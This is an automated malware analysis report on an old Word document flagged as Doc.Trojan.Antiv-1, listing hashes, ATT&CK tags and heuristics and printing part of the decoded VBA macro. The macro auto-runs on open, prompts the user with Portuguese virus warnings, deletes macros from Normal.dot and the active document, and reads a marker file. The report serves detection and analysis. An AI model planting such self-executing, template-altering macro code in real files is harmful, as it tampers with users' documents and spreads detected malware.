Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bb423c0efad6c914…

MALICIOUS

Office (OLE)

66.5 KB Created: 2000-08-18 22:26:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: fbe835a48ce7fff276ba68203dc1f39c SHA-1: 0e09502f143b49d3f62acbea07f79de649c348ca SHA-256: bb423c0efad6c9148a7839eb8efd7ce9939461885f7be41322288444d8e455dc
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros, specifically an AutoOpen macro. The macro's code suggests it attempts to deceive the user into removing other macros by presenting a warning about potential viruses. This behavior is indicative of a downloader or a component designed to evade detection. The ClamAV detection 'Doc.Trojan.Antiv-1' further supports its malicious nature.

Heuristics 4

  • ClamAV: Doc.Trojan.Antiv-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Antiv-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10281 bytes
SHA-256: 3dcd1eaa27766e8415636b1c05aa7e598805b411412d3ba5c30bbbe27612a642
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Hunter"
Public nomearq As String
Public nomemod As String
Public frase As String
Public frase1 As String
'Este vírusantivírus foi criado por ¥@®
Sub AutoOpen()
    antiv
    multi
    TimeT
End Sub
Sub antiv()
On Error Resume Next
Dim i As Integer
Dim mensagem, botao, titulo
    i = NormalTemplate.VBProject.VBComponents.Count
Do While NormalTemplate.VBProject.VBComponents.Count > 0
    If NormalTemplate.VBProject.VBComponents(i).Name = "Hunter" Then GoTo Salto
    If NormalTemplate.VBProject.VBComponents(i).Name = "ThisDocument" Then GoTo Salto
        frase1 = " que foi removido pelo Hunter ."
        frase = " possuia o módulo "
        nomearq = NormalTemplate.FullName
        nomemod = NormalTemplate.VBProject.VBComponents(i).Name
        mensagem = "Voçe Possui o Macro " + NormalTemplate.VBProject.VBComponents(i).Name + " em seu arquivo " + NormalTemplate.FullName + " ." + Chr(13) + Chr(13) + "Macros desse tipo pode conter vírus . . ." + Chr(13) + Chr(13) + "Deseja remover o macro . É aconselhavel . . ."
        botao = vbYesNo
        titulo = "Hunter"
        resp = MsgBox(mensagem, botao, titulo)
    If resp = vbYes Then
        Application.OrganizerDelete NormalTemplate.FullName, NormalTemplate.VBProject.VBComponents(i).Name, wdOrganizerObjectProjectItems
        arqlog
    Else
        mensagem = "Tem Certeza ??? " + Chr(13) + Chr(13) + "Alguns VÍRUS podem danificar este computador !!!" + Chr(13) + Chr(13) + "Clique 'Sim' para remover o " + NormalTemplate.VBProject.VBComponents(i).Name + " e 'Não' para manter o macro ."
        botao = vbYesNo
        titulo = "Hunter"
        resp = MsgBox(mensagem, botao, titulo)
    If resp = vbYes Then
        Application.OrganizerDelete NormalTemplate.FullName, NormalTemplate.VBProject.VBComponents(i).Name, wdOrganizerObjectProjectItems
        arqlog
    End If
    End If

Salto:
    i = i - 1
    If i < 1 Then Exit Do
Loop
    kk = ActiveDocument.VBProject.VBComponents.Count
Do While ActiveDocument.VBProject.VBComponents.Count > 0
    If ActiveDocument.VBProject.VBComponents(kk).Name = "Hunter" Then GoTo Salto1
    If ActiveDocument.VBProject.VBComponents(kk).Name = "ThisDocument" Then GoTo Salto1
        frase1 = " que foi removido pelo Hunter ."
        frase = " possuia o módulo "
        nomearq = ActiveDocument.FullName
        nomemod = ActiveDocument.VBProject.VBComponents(kk).Name
        mensagem = "Voçe Possui o Macro " + ActiveDocument.VBProject.VBComponents(kk).Name + " em seu arquivo " + ActiveDocument.FullName + " ." + Chr(13) + Chr(13) + "Macros desse tipo pode conter vírus . . ." + Chr(13) + Chr(13) + "Deseja remover o macro . É aconselhavel . . ."
        botao = vbYesNo
        titulo = "Hunter"
        resp = MsgBox(mensagem, botao, titulo)
    If resp = vbYes Then
        Application.OrganizerDelete ActiveDocument.FullName, ActiveDocument.VBProject.VBComponents(kk).Name, wdOrganizerObjectProjectItems
        arqlog
    Else
        mensagem = "Tem Certeza ??? " + Chr(13) + Chr(13) + "Alguns VÍRUS podem danificar este computador !!!" + Chr(13) + Chr(13) + "Clique 'Sim' para remover o " + ActiveDocument.VBProject.VBComponents(kk).Name + " e 'Não' para manter o macro ."
        botao = vbYesNo
        titulo = "Hunter"
        resp = MsgBox(mensagem, botao, titulo)
    If resp = vbYes Then
        Application.OrganizerDelete ActiveDocument.FullName, ActiveDocument.VBProject.VBComponents(kk).Name, wdOrganizerObjectProjectItems
        arqlog
    End If
    End If
Salto1:
    kk = kk - 1
    If kk < 1 Then Exit Do
Loop

On Error GoTo msgarq
SetAttr "c:\msg", 0
Open "c:\msg" For Input As #1
        Do Until EOF(1)
            Input #1, MM
        Loop
    Close #1
If MM = "sim" Then
    aa = 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.